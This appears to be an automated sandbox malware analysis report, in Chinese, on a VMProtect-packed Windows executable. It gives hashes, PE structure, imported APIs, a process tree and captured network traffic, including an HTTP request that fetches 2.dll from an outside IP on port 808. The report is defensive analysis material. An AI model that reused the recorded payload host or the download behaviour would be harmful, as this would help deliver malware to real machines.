恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-shaapp03-1	2023-01-27 12:51:58	2023-01-27 12:53:51	113 秒

魔盾分数

10.0

危险的

文件详细信息

文件名	单透最新版.exe
文件大小	1757902 字节
文件类型	PE32 executable (console) Intel 80386, for MS Windows
MD5	d1bd0a3adc7910500d81b1f8bf5c8b0c
SHA1	12b87028d67ad29341759855c6f83358bc957093
SHA256	216dd9f8b24119a4ee154b714347236d30a74c845010a48c76614f5c01e534ca
SHA512	ed78447e4d613fb15e3518312565d98bd47d5ea0e17bb9a521f10650281ff6bba7d06c27493d3d397ccf9c9e421c6b9f95b39830066d3807334f526e596a8ae5
CRC32	79971687
Ssdeep	24576:KSyF/+wxoVOyBTlrNr/qrPrTO+yyoMau9D4q9JNK:KSM+GyBbjGPrTxFrUZ
Yara	登录查看Yara规则
	找不到该样本提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
是	112.45.33.153	中国

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

摘要

登录查看详细行为信息

PE 信息

初始地址	0x00400000
入口地址	0x0047bb4e
声明校验值	0x00000000
实际校验值	0x001afeeb
最低操作系统版本要求	4.0
编译时间	2023-01-27 12:46:55
载入哈希	dfa5f2c83971773ad8cafaeba6ba8821
图标
图标精确哈希值	4bc23123cdcbbb4463c4764db670208d
图标相似性哈希值	0acb0cb5a33f4ee4763f9494bbf9cafa

版本信息

LegalCopyright
FileVersion
CompanyName
Comments
ProductName
ProductVersion
FileDescription
Translation

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x0009c01e	0x0009d000	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.60
.rdata	0x0009e000	0x000a994e	0x000aa000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	6.75
.data	0x00148000	0x000524a8	0x0001a000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	4.94
.rsrc	0x0019b000	0x0004aadc	0x0004b000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	4.93

覆盖

偏移量	0x001ad000
大小	0x000002ce

资源

名称	偏移量	大小	语言	子语言	熵(Entropy)	文件类型
TEXTINCLUDE	0x0019bc50	0x00000151	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	5.25	C source, ASCII text, with CRLF line terminators
TEXTINCLUDE	0x0019bc50	0x00000151	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	5.25	C source, ASCII text, with CRLF line terminators
TEXTINCLUDE	0x0019bc50	0x00000151	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	5.25	C source, ASCII text, with CRLF line terminators
RT_CURSOR	0x0019c140	0x000000b4	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.74	data
RT_CURSOR	0x0019c140	0x000000b4	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.74	data
RT_CURSOR	0x0019c140	0x000000b4	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.74	data
RT_CURSOR	0x0019c140	0x000000b4	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.74	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_BITMAP	0x0019d848	0x00000144	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.88	data
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x001a1854	0x00042028	LANG_NEUTRAL	SUBLANG_NEUTRAL	4.82	dBase III DBT, version number 0, next free block index 40
RT_MENU	0x001e3888	0x00000284	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	4.28	data
RT_MENU	0x001e3888	0x00000284	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	4.28	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_DIALOG	0x001e4ad0	0x0000018c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.74	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_STRING	0x001e5518	0x00000024	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	0.90	data
RT_GROUP_CURSOR	0x001e5564	0x00000022	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.25	MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR	0x001e5564	0x00000022	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.25	MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR	0x001e5564	0x00000022	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.25	MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_ICON	0x001e55dc	0x00000014	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.02	MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON	0x001e55dc	0x00000014	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.02	MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON	0x001e55dc	0x00000014	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	2.02	MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_VERSION	0x001e55f0	0x0000031c	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.53	data
RT_MANIFEST	0x001e590c	0x000001cd	LANG_NEUTRAL	SUBLANG_NEUTRAL	5.08	XML 1.0 document, ASCII text, with very long lines, with no line terminators

导入

库: RASAPI32.dll:

• 0x49e3c8 RasGetConnectStatusA

• 0x49e3cc RasHangUpA

库: KERNEL32.dll:

• 0x49e170 GetFileType

• 0x49e174 SetStdHandle

• 0x49e178 GetACP

• 0x49e17c HeapSize

• 0x49e180 TerminateProcess

• 0x49e184 RaiseException

• 0x49e188 GetConsoleMode

• 0x49e18c SetConsoleMode

• 0x49e190 ReadConsoleInputA

• 0x49e194 GetLocalTime

• 0x49e198 GetSystemTime

• 0x49e19c RtlUnwind

• 0x49e1a0 GetStartupInfoA

• 0x49e1a4 GetOEMCP

• 0x49e1a8 GetCPInfo

• 0x49e1ac GetProcessVersion

• 0x49e1b0 SetErrorMode

• 0x49e1b4 GlobalFlags

• 0x49e1b8 GetCurrentThread

• 0x49e1bc GetFileTime

• 0x49e1c0 GetFileSize

• 0x49e1c4 UnhandledExceptionFilter

• 0x49e1c8 LocalReAlloc

• 0x49e1cc TlsSetValue

• 0x49e1d0 TlsFree

• 0x49e1d4 GlobalHandle

• 0x49e1d8 TlsAlloc

• 0x49e1dc LocalAlloc

• 0x49e1e0 lstrcmpA

• 0x49e1e4 GetVersion

• 0x49e1e8 GlobalGetAtomNameA

• 0x49e1ec GlobalAddAtomA

• 0x49e1f0 GlobalFindAtomA

• 0x49e1f4 GlobalDeleteAtom

• 0x49e1f8 lstrcmpiA

• 0x49e1fc SetEndOfFile

• 0x49e200 UnlockFile

• 0x49e204 LockFile

• 0x49e208 FlushFileBuffers

• 0x49e20c SetFilePointer

• 0x49e210 DuplicateHandle

• 0x49e214 lstrcpynA

• 0x49e218 FileTimeToLocalFileTime

• 0x49e21c LocalFree

• 0x49e220 InterlockedDecrement

• 0x49e224 InterlockedIncrement

• 0x49e228 FreeEnvironmentStringsA

• 0x49e22c FreeEnvironmentStringsW

• 0x49e230 GetEnvironmentStrings

• 0x49e234 GetEnvironmentStringsW

• 0x49e238 SetHandleCount

• 0x49e23c GetEnvironmentVariableA

• 0x49e240 HeapDestroy

• 0x49e244 HeapCreate

• 0x49e248 VirtualFree

• 0x49e24c SetEnvironmentVariableA

• 0x49e250 LCMapStringA

• 0x49e254 LCMapStringW

• 0x49e258 VirtualAlloc

• 0x49e25c IsBadWritePtr

• 0x49e260 GetStringTypeA

• 0x49e264 GetStringTypeW

• 0x49e268 SetUnhandledExceptionFilter

• 0x49e26c CompareStringA

• 0x49e270 CompareStringW

• 0x49e274 SuspendThread

• 0x49e278 ReleaseMutex

• 0x49e27c CreateMutexA

• 0x49e280 SetLastError

• 0x49e284 GetTimeZoneInformation

• 0x49e288 FileTimeToSystemTime

• 0x49e28c GetCurrentProcess

• 0x49e290 GetWindowsDirectoryA

• 0x49e294 GetSystemDirectoryA

• 0x49e298 SetConsoleTextAttribute

• 0x49e29c GetConsoleScreenBufferInfo

• 0x49e2a0 SetConsoleCursorPosition

• 0x49e2a4 GetStdHandle

• 0x49e2a8 TerminateThread

• 0x49e2ac CreateSemaphoreA

• 0x49e2b0 ResumeThread

• 0x49e2b4 ReleaseSemaphore

• 0x49e2b8 EnterCriticalSection

• 0x49e2bc LeaveCriticalSection

• 0x49e2c0 GetProfileStringA

• 0x49e2c4 WriteFile

• 0x49e2c8 WaitForMultipleObjects

• 0x49e2cc CreateFileA

• 0x49e2d0 SetEvent

• 0x49e2d4 FindResourceA

• 0x49e2d8 LoadResource

• 0x49e2dc LockResource

• 0x49e2e0 ReadFile

• 0x49e2e4 GetExitCodeProcess

• 0x49e2e8 RemoveDirectoryA

• 0x49e2ec GetModuleFileNameA

• 0x49e2f0 WideCharToMultiByte

• 0x49e2f4 MultiByteToWideChar

• 0x49e2f8 GetCurrentThreadId

• 0x49e2fc ExitProcess

• 0x49e300 GlobalSize

• 0x49e304 GlobalFree

• 0x49e308 DeleteCriticalSection

• 0x49e30c InitializeCriticalSection

• 0x49e310 lstrcatA

• 0x49e314 lstrlenA

• 0x49e318 WinExec

• 0x49e31c lstrcpyA

• 0x49e320 FindNextFileA

• 0x49e324 GlobalReAlloc

• 0x49e328 HeapFree

• 0x49e32c HeapReAlloc

• 0x49e330 GetProcessHeap

• 0x49e334 HeapAlloc

• 0x49e338 GetFullPathNameA

• 0x49e33c FreeLibrary

• 0x49e340 LoadLibraryA

• 0x49e344 GetLastError

• 0x49e348 GetVersionExA

• 0x49e34c WritePrivateProfileStringA

• 0x49e350 CreateThread

• 0x49e354 CreateEventA

• 0x49e358 Sleep

• 0x49e35c GlobalAlloc

• 0x49e360 GlobalLock

• 0x49e364 GlobalUnlock

• 0x49e368 GetTempPathA

• 0x49e36c FindFirstFileA

• 0x49e370 FindClose

• 0x49e374 SetFileAttributesA

• 0x49e378 GetFileAttributesA

• 0x49e37c DeleteFileA

• 0x49e380 SetCurrentDirectoryA

• 0x49e384 GetVolumeInformationA

• 0x49e388 GetModuleHandleA

• 0x49e38c GetProcAddress

• 0x49e390 MulDiv

• 0x49e394 GetCommandLineA

• 0x49e398 GetTickCount

• 0x49e39c CreateProcessA

• 0x49e3a0 WaitForSingleObject

• 0x49e3a4 CloseHandle

• 0x49e3a8 IsBadReadPtr

• 0x49e3ac IsBadCodePtr

• 0x49e3b0 TlsGetValue

库: USER32.dll:

• 0x49e3e4 DrawFrameControl

• 0x49e3e8 DrawEdge

• 0x49e3ec DrawFocusRect

• 0x49e3f0 WindowFromPoint

• 0x49e3f4 GetMessageA

• 0x49e3f8 DispatchMessageA

• 0x49e3fc SetRectEmpty

• 0x49e400 RegisterClipboardFormatA

• 0x49e404 CreateIconFromResourceEx

• 0x49e408 CreateIconFromResource

• 0x49e40c DrawIconEx

• 0x49e410 CreatePopupMenu

• 0x49e414 AppendMenuA

• 0x49e418 ModifyMenuA

• 0x49e41c CreateMenu

• 0x49e420 CreateAcceleratorTableA

• 0x49e424 GetDlgCtrlID

• 0x49e428 GetSubMenu

• 0x49e42c EnableMenuItem

• 0x49e430 ClientToScreen

• 0x49e434 EnumDisplaySettingsA

• 0x49e438 LoadImageA

• 0x49e43c SystemParametersInfoA

• 0x49e440 ShowWindow

• 0x49e444 IsWindowEnabled

• 0x49e448 TranslateAcceleratorA

• 0x49e44c GetKeyState

• 0x49e450 CopyAcceleratorTableA

• 0x49e454 PostQuitMessage

• 0x49e458 GetSysColorBrush

• 0x49e45c LoadStringA

• 0x49e460 GetDesktopWindow

• 0x49e464 GetClassNameA

• 0x49e468 GetMenuCheckMarkDimensions

• 0x49e46c GetMenuState

• 0x49e470 SetMenuItemBitmaps

• 0x49e474 CheckMenuItem

• 0x49e478 TranslateMessage

• 0x49e47c IsDialogMessageA

• 0x49e480 ScrollWindowEx

• 0x49e484 SendDlgItemMessageA

• 0x49e488 MapWindowPoints

• 0x49e48c AdjustWindowRectEx

• 0x49e490 IsZoomed

• 0x49e494 GetClassInfoA

• 0x49e498 DefWindowProcA

• 0x49e49c GetMenu

• 0x49e4a0 SetMenu

• 0x49e4a4 PeekMessageA

• 0x49e4a8 IsIconic

• 0x49e4ac SetFocus

• 0x49e4b0 GetActiveWindow

• 0x49e4b4 GetWindow

• 0x49e4b8 DestroyAcceleratorTable

• 0x49e4bc SetWindowRgn

• 0x49e4c0 GetMessagePos

• 0x49e4c4 ScreenToClient

• 0x49e4c8 ChildWindowFromPointEx

• 0x49e4cc CopyRect

• 0x49e4d0 LoadBitmapA

• 0x49e4d4 WinHelpA

• 0x49e4d8 KillTimer

• 0x49e4dc SetTimer

• 0x49e4e0 ReleaseCapture

• 0x49e4e4 GetCapture

• 0x49e4e8 SetCapture

• 0x49e4ec GetScrollRange

• 0x49e4f0 SetScrollRange

• 0x49e4f4 SetScrollPos

• 0x49e4f8 SetRect

• 0x49e4fc InflateRect

• 0x49e500 IntersectRect

• 0x49e504 DestroyIcon

• 0x49e508 PtInRect

• 0x49e50c OffsetRect

• 0x49e510 IsWindowVisible

• 0x49e514 EnableWindow

• 0x49e518 RedrawWindow

• 0x49e51c GetWindowLongA

• 0x49e520 SetWindowLongA

• 0x49e524 GetSysColor

• 0x49e528 SetActiveWindow

• 0x49e52c SetCursorPos

• 0x49e530 LoadCursorA

• 0x49e534 SetCursor

• 0x49e538 GetDC

• 0x49e53c FillRect

• 0x49e540 IsRectEmpty

• 0x49e544 ReleaseDC

• 0x49e548 IsChild

• 0x49e54c DestroyMenu

• 0x49e550 SetForegroundWindow

• 0x49e554 GetWindowRect

• 0x49e558 EqualRect

• 0x49e55c UpdateWindow

• 0x49e560 ValidateRect

• 0x49e564 InvalidateRect

• 0x49e568 GetClientRect

• 0x49e56c GetFocus

• 0x49e570 GetParent

• 0x49e574 GetTopWindow

• 0x49e578 PostMessageA

• 0x49e57c IsWindow

• 0x49e580 SetParent

• 0x49e584 DestroyCursor

• 0x49e588 SendMessageA

• 0x49e58c SetWindowPos

• 0x49e590 MessageBoxA

• 0x49e594 GetCursorPos

• 0x49e598 GetSystemMetrics

• 0x49e59c EmptyClipboard

• 0x49e5a0 SetClipboardData

• 0x49e5a4 OpenClipboard

• 0x49e5a8 GetClipboardData

• 0x49e5ac CloseClipboard

• 0x49e5b0 wsprintfA

• 0x49e5b4 LoadIconA

• 0x49e5b8 GetForegroundWindow

• 0x49e5bc SetWindowTextA

• 0x49e5c0 UnregisterClassA

• 0x49e5c4 MoveWindow

• 0x49e5c8 GetWindowTextA

• 0x49e5cc GetWindowTextLengthA

• 0x49e5d0 CharUpperA

• 0x49e5d4 GetWindowDC

• 0x49e5d8 BeginPaint

• 0x49e5dc EndPaint

• 0x49e5e0 TabbedTextOutA

• 0x49e5e4 DrawTextA

• 0x49e5e8 GrayStringA

• 0x49e5ec GetDlgItem

• 0x49e5f0 DestroyWindow

• 0x49e5f4 CreateDialogIndirectParamA

• 0x49e5f8 EndDialog

• 0x49e5fc GetNextDlgTabItem

• 0x49e600 GetWindowPlacement

• 0x49e604 RegisterWindowMessageA

• 0x49e608 GetLastActivePopup

• 0x49e60c GetMessageTime

• 0x49e610 RemovePropA

• 0x49e614 CallWindowProcA

• 0x49e618 GetPropA

• 0x49e61c UnhookWindowsHookEx

• 0x49e620 SetPropA

• 0x49e624 GetClassLongA

• 0x49e628 CallNextHookEx

• 0x49e62c SetWindowsHookExA

• 0x49e630 CreateWindowExA

• 0x49e634 GetMenuItemID

• 0x49e638 GetMenuItemCount

• 0x49e63c RegisterClassA

• 0x49e640 GetScrollPos

库: GDI32.dll:

• 0x49e024 PtVisible

• 0x49e028 RectVisible

• 0x49e02c TextOutA

• 0x49e030 ExtTextOutA

• 0x49e034 Escape

• 0x49e038 GetTextMetricsA

• 0x49e03c GetViewportExtEx

• 0x49e040 SetBkColor

• 0x49e044 CreateRectRgnIndirect

• 0x49e048 SetStretchBltMode

• 0x49e04c GetClipRgn

• 0x49e050 CreatePolygonRgn

• 0x49e054 SelectClipRgn

• 0x49e058 DeleteObject

• 0x49e05c CreateDIBitmap

• 0x49e060 GetSystemPaletteEntries

• 0x49e064 CreatePalette

• 0x49e068 StretchBlt

• 0x49e06c SelectPalette

• 0x49e070 RealizePalette

• 0x49e074 GetDIBits

• 0x49e078 GetWindowExtEx

• 0x49e07c GetViewportOrgEx

• 0x49e080 GetWindowOrgEx

• 0x49e084 BeginPath

• 0x49e088 EndPath

• 0x49e08c PathToRegion

• 0x49e090 CreateEllipticRgn

• 0x49e094 CreateRoundRectRgn

• 0x49e098 GetTextColor

• 0x49e09c GetBkColor

• 0x49e0a0 GetROP2

• 0x49e0a4 GetStretchBltMode

• 0x49e0a8 GetPolyFillMode

• 0x49e0ac CreateCompatibleBitmap

• 0x49e0b0 CreateDCA

• 0x49e0b4 CreateBitmap

• 0x49e0b8 SelectObject

• 0x49e0bc GetObjectA

• 0x49e0c0 CreatePen

• 0x49e0c4 PatBlt

• 0x49e0c8 CombineRgn

• 0x49e0cc CreateRectRgn

• 0x49e0d0 FillRgn

• 0x49e0d4 CreateSolidBrush

• 0x49e0d8 GetStockObject

• 0x49e0dc CreateFontIndirectA

• 0x49e0e0 EndPage

• 0x49e0e4 EndDoc

• 0x49e0e8 DeleteDC

• 0x49e0ec StartDocA

• 0x49e0f0 StartPage

• 0x49e0f4 BitBlt

• 0x49e0f8 CreateCompatibleDC

• 0x49e0fc Ellipse

• 0x49e100 Rectangle

• 0x49e104 LPtoDP

• 0x49e108 DPtoLP

• 0x49e10c GetCurrentObject

• 0x49e110 RoundRect

• 0x49e114 GetTextExtentPoint32A

• 0x49e118 GetDeviceCaps

• 0x49e11c ExtSelectClipRgn

• 0x49e120 LineTo

• 0x49e124 MoveToEx

• 0x49e128 ExcludeClipRect

• 0x49e12c GetClipBox

• 0x49e130 ScaleWindowExtEx

• 0x49e134 SetWindowExtEx

• 0x49e138 SetWindowOrgEx

• 0x49e13c ScaleViewportExtEx

• 0x49e140 SetViewportExtEx

• 0x49e144 OffsetViewportOrgEx

• 0x49e148 SetViewportOrgEx

• 0x49e14c SetMapMode

• 0x49e150 SetTextColor

• 0x49e154 SetROP2

• 0x49e158 SetPolyFillMode

• 0x49e15c SetBkMode

• 0x49e160 RestoreDC

• 0x49e164 SaveDC

• 0x49e168 GetBkMode

库: WINMM.dll:

• 0x49e674 waveOutUnprepareHeader

• 0x49e678 waveOutPrepareHeader

• 0x49e67c waveOutWrite

• 0x49e680 waveOutPause

• 0x49e684 waveOutRestart

• 0x49e688 waveOutReset

• 0x49e68c waveOutClose

• 0x49e690 waveOutGetNumDevs

• 0x49e694 waveOutOpen

• 0x49e698 midiOutUnprepareHeader

• 0x49e69c midiStreamOpen

• 0x49e6a0 midiStreamProperty

• 0x49e6a4 midiOutPrepareHeader

• 0x49e6a8 midiStreamOut

• 0x49e6ac midiStreamStop

• 0x49e6b0 midiOutReset

• 0x49e6b4 midiStreamClose

• 0x49e6b8 midiStreamRestart

库: WINSPOOL.DRV:

• 0x49e6c0 OpenPrinterA

• 0x49e6c4 DocumentPropertiesA

• 0x49e6c8 ClosePrinter

库: ADVAPI32.dll:

• 0x49e000 RegQueryValueA

• 0x49e004 RegSetValueExA

• 0x49e008 RegOpenKeyExA

• 0x49e00c RegCloseKey

• 0x49e010 RegCreateKeyExA

库: SHELL32.dll:

• 0x49e3d4 SHGetSpecialFolderPathA

• 0x49e3d8 Shell_NotifyIconA

• 0x49e3dc ShellExecuteA

库: ole32.dll:

• 0x49e71c CLSIDFromString

• 0x49e720 OleUninitialize

• 0x49e724 OleInitialize

库: OLEAUT32.dll:

• 0x49e3b8 UnRegisterTypeLib

• 0x49e3bc RegisterTypeLib

• 0x49e3c0 LoadTypeLib

库: COMCTL32.dll:

• 0x49e018 ImageList_Destroy

• 0x49e01c None

库: WS2_32.dll:

• 0x49e6d0 closesocket

• 0x49e6d4 WSAAsyncSelect

• 0x49e6d8 select

• 0x49e6dc inet_ntoa

• 0x49e6e0 WSACleanup

• 0x49e6e4 WSAStartup

• 0x49e6e8 recvfrom

• 0x49e6ec recv

• 0x49e6f0 getpeername

• 0x49e6f4 send

• 0x49e6f8 accept

• 0x49e6fc ntohl

• 0x49e700 ioctlsocket

库: WININET.dll:

• 0x49e648 InternetCanonicalizeUrlA

• 0x49e64c InternetCrackUrlA

• 0x49e650 HttpOpenRequestA

• 0x49e654 HttpSendRequestA

• 0x49e658 HttpQueryInfoA

• 0x49e65c InternetReadFile

• 0x49e660 InternetConnectA

• 0x49e664 InternetSetOptionA

• 0x49e668 InternetCloseHandle

• 0x49e66c InternetOpenA

库: comdlg32.dll:

• 0x49e708 GetSaveFileNameA

• 0x49e70c GetOpenFileNameA

• 0x49e710 ChooseColorA

• 0x49e714 GetFileTitleA

.text
`.rdata
@.data
.rsrc
VMProtect end
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
VMProtect begin
8`}<j
T$th 
D$@Sj
L$8h 
F4XVS
D$8Rj
l$<VWj
D$L0VS
}'h  
9^xu5j
T$,Qj
T$0Pj
D$8RPj
D$0h 
T$,Qj
NpRQj
t$<Vj
D$X\aS
D$X\aS
T$<h 
D$(hF
D$(h 

没有防病毒引擎扫描信息!

进程树

_______________.exe id: 2636
- cmd.exe id: 2900
- _______________.exe id: 3036
  - cmd.exe id: 2340

_______________.exe, PID: 2636, 上一级进程 PID: 2312

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

cmd.exe, PID: 2900, 上一级进程 PID: 2636

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

_______________.exe, PID: 3036, 上一级进程 PID: 2636

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

cmd.exe, PID: 2340, 上一级进程 PID: 3036

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

services.exe, PID: 432, 上一级进程 PID: 344

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
是	112.45.33.153	中国

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49162	112.45.33.153	808
192.168.122.201	49166	112.45.33.153	808
192.168.122.201	49167	112.45.33.153	1008
192.168.122.201	49160	23.67.75.113	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	59401	192.168.122.1	53

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49162	112.45.33.153	808
192.168.122.201	49166	112.45.33.153	808
192.168.122.201	49167	112.45.33.153	1008
192.168.122.201	49160	23.67.75.113	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.201	59401	192.168.122.1	53

HTTP 请求

URI	HTTP数据
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip	GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: / If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache
URL专业沙箱检测 -> http://112.45.33.153:808/2.dll	GET /2.dll HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: / Host: 112.45.33.153:808 Cache-Control: no-cache

URI

HTTP数据

URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip

GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

URL专业沙箱检测 -> http://112.45.33.153:808/2.dll

GET /2.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 112.45.33.153:808
Cache-Control: no-cache

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Protocol	SID	Signature	Category
2023-01-27 12:52:31.763205+0800	192.168.122.201	49162	112.45.33.153	808	TCP	2016879	ET POLICY Unsupported/Fake Windows NT Version 5.0	Potential Corporate Privacy Violation
2023-01-27 12:52:38.189319+0800	192.168.122.201	49166	112.45.33.153	808	TCP	2016879	ET POLICY Unsupported/Fake Windows NT Version 5.0	Potential Corporate Privacy Violation
